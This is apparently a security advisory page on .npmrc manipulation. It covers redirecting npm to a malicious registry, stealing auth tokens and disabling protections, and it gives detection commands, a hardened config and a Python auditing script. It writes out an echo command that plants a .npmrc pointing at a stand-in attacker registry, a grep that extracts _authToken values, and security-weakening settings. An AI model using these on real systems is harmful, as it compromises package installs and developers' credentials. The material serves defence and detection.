.npmrc Manipulation

Category: npm Configuration Abuse | Severity: medium | Platforms: Linux, macOS, Windows
.npmrc files control npm behavior including registry URLs, authentication tokens, and script execution settings. An attacker with file write access to a project or user-level .npmrc can redirect all package installations to a malicious registry, steal auth tokens, or re-enable dangerous script execution. Because npm loads .npmrc from multiple locations (project, user, global), a single malicious file can silently compromise an entire development workflow.

Prerequisites

  • Write access to the target filesystem (project directory, user home directory, or global npm config)
  • Target must subsequently run npm install or similar npm commands

Attack Scenarios

Redirecting Registry to a Malicious Server

An attacker with write access to the project directory places a .npmrc file that points the npm registry to an attacker-controlled server. All subsequent npm install commands will fetch trojanized packages from the malicious registry instead of the official one.

Malicious .npmrc redirecting the default registry
registry=https://evil-registry.example.com/
strict-ssl=false
Dropping the malicious .npmrc into a project
echo -e "registry=https://evil-registry.example.com/\nstrict-ssl=false" > /path/to/project/.npmrc

Stealing npm Auth Tokens

If a developer's ~/.npmrc contains an auth token for publishing packages, an attacker with read access to the home directory can extract the token and use it to publish malicious versions of the developer's packages.

Extracting auth tokens from ~/.npmrc
cat ~/.npmrc | grep '_authToken'
# Output: //registry.npmjs.org/:_authToken=npm_XXXXXXXXXXXX

Disabling Security Controls via .npmrc

An attacker modifies .npmrc to explicitly re-enable lifecycle script execution (ignore-scripts=false), disable strict SSL verification, allow scripts to run with root privileges, and suppress npm audit, weakening the security posture of every npm operation that reads the file.

.npmrc that disables security protections
ignore-scripts=false
strict-ssl=false
unsafe-perm=true
audit=false
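For comparison, the corresponding hardened settings. This is an added example, not configuration from the original page; the registry URL and the use of an NPM_TOKEN environment variable are assumptions about one organisation's setup.

```ini
; hardened project-level .npmrc (added example, not from the original page)
; pin the registry so a scoped or user-level override cannot silently redirect installs
registry=https://registry.npmjs.org/
; keep TLS certificate verification on
strict-ssl=true
; block lifecycle scripts during install; re-enable per package only after review
ignore-scripts=true
; keep vulnerability reporting on
audit=true
; no _authToken or _auth lines here: credentials come from the NPM_TOKEN
; environment variable (assumed) or an interactive npm login session
```

Note that a project-level .npmrc takes precedence over the user-level and global files, so an attacker-placed file in the project directory overrides whatever a developer has configured in ~/.npmrc; that is why the project file is the one to pin and track in version control. ignore-scripts=true will break packages that rely on install scripts (native builds, post-install downloads), so introduce it with an allowlist of packages that genuinely need them.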

Detection

Audit .npmrc Files Across All Locations

Regularly check for .npmrc files in project directories, user home directories, and global npm config paths. Verify that registry URLs point to expected registries and that no unexpected auth tokens are present.

npm config list -l 2>/dev/null | grep -E 'registry|_authToken|strict-ssl|ignore-scripts'
find / -name '.npmrc' -type f 2>/dev/null | head -20

Monitor .npmrc Changes in Version Control

Ensure .npmrc files in project repositories are tracked in version control and changes are reviewed. Use CI/CD checks to validate that the registry URL has not been tampered with.

git diff HEAD -- .npmrc
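Both checks above (the filesystem-wide audit and the CI pre-check on registry settings) can be automated with a small parser. The following script is an added example, not tooling from npm or from the original page; the allowed-registry set, the severity labels, and the sample .npmrc contents are assumptions constructed for illustration. It parses each .npmrc it is given, handles the default registry, scoped @scope:registry entries, and //host/:_authToken credential lines, and reports settings that redirect installs, weaken TLS, re-enable scripts, or embed tokens in a project-level file.

```python
#!/usr/bin/env python3
"""Audit .npmrc files against an expected-registry policy (added example)."""
import os
import sys
from dataclasses import dataclass
from urllib.parse import urlparse

# Policy assumption: the only registry hosts this organisation expects to see.
ALLOWED_REGISTRY_HOSTS = {"registry.npmjs.org"}

# Keys whose values are credentials; they must never sit in a project-level file.
SECRET_KEYS = {"_authtoken", "_auth", "_password"}

# Explicit settings that lower npm's security posture (key, value) -> reason.
RISKY_SETTINGS = {
    ("strict-ssl", "false"): "TLS certificate verification disabled",
    ("ignore-scripts", "false"): "lifecycle script execution explicitly re-enabled",
    ("unsafe-perm", "true"): "scripts allowed to run with root privileges",
    ("audit", "false"): "npm audit suppressed",
}


@dataclass
class Finding:
    path: str
    line_no: int
    severity: str
    message: str


def parse_npmrc(text):
    """Yield (line_no, key, value) for each key=value line; skip comments and blanks."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith(("#", ";")) or "=" not in line:
            continue
        key, _, value = line.partition("=")
        yield line_no, key.strip(), value.strip()


def audit_npmrc_text(text, path="<.npmrc>", project_level=True):
    """Return a list of Findings for one .npmrc body."""
    findings = []
    for line_no, key, value in parse_npmrc(text):
        key_l = key.lower()
        if key_l == "registry" or key_l.endswith(":registry"):
            # registry=... and @scope:registry=... both redirect package fetches
            host = urlparse(value).hostname or ""
            if host not in ALLOWED_REGISTRY_HOSTS:
                findings.append(Finding(path, line_no, "high",
                                        f"{key} points to unexpected host {host!r}"))
        elif key_l.startswith("//") and key_l.rsplit(":", 1)[-1] in SECRET_KEYS:
            # //host/:_authToken=... sends that token to `host` on every request
            host = key[2:].split("/", 1)[0]
            if project_level:
                findings.append(Finding(path, line_no, "high",
                                        f"credential for {host} stored in project-level file"))
            elif host not in ALLOWED_REGISTRY_HOSTS:
                findings.append(Finding(path, line_no, "high",
                                        f"credential would be sent to unexpected host {host!r}"))
        elif key_l in SECRET_KEYS:
            findings.append(Finding(path, line_no, "high", f"legacy credential key {key} present"))
        else:
            reason = RISKY_SETTINGS.get((key_l, value.lower()))
            if reason:
                findings.append(Finding(path, line_no, "medium", f"{key}={value}: {reason}"))
    return findings


def audit_paths(paths, project_level=True):
    """Audit every readable file in `paths`; missing files are skipped."""
    findings = []
    for path in paths:
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings.extend(audit_npmrc_text(fh.read(), path, project_level))
    return findings


# Constructed sample inputs (not real files); the token is an obvious placeholder.
SAMPLE_MALICIOUS = """# constructed project-level .npmrc
registry=https://evil-registry.example.com/
strict-ssl=false
ignore-scripts=false
//registry.npmjs.org/:_authToken=npm_PLACEHOLDER
audit=false
"""
SAMPLE_CLEAN = "registry=https://registry.npmjs.org/\nstrict-ssl=true\n"

if __name__ == "__main__":
    # Usage: audit_npmrc.py ./.npmrc ~/.npmrc ... ; exits 1 if any high finding (CI gate)
    results = audit_paths(sys.argv[1:] or [".npmrc"])
    for f in results:
        print(f"{f.path}:{f.line_no}: [{f.severity}] {f.message}")
    sys.exit(1 if any(f.severity == "high" for f in results) else 0)
```

Run it in the CI pre-check step against the checked-out project's .npmrc with project_level=True, and on developer workstations against ~/.npmrc with project_level=False, where a token for an allowed registry is normal but a token addressed to any other host is not.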

Mitigation

  • Track .npmrc files in version control and require code review for any changes to registry or auth settings
  • Never store auth tokens in project-level .npmrc files; use environment variables or npm login sessions instead
  • Enforce strict-ssl=true and verify registry URLs in CI/CD pipeline pre-checks
  • Use file integrity monitoring to detect unauthorized changes to .npmrc in developer home directories
  • Restrict filesystem write access on CI/CD build agents to prevent unauthorized .npmrc placement
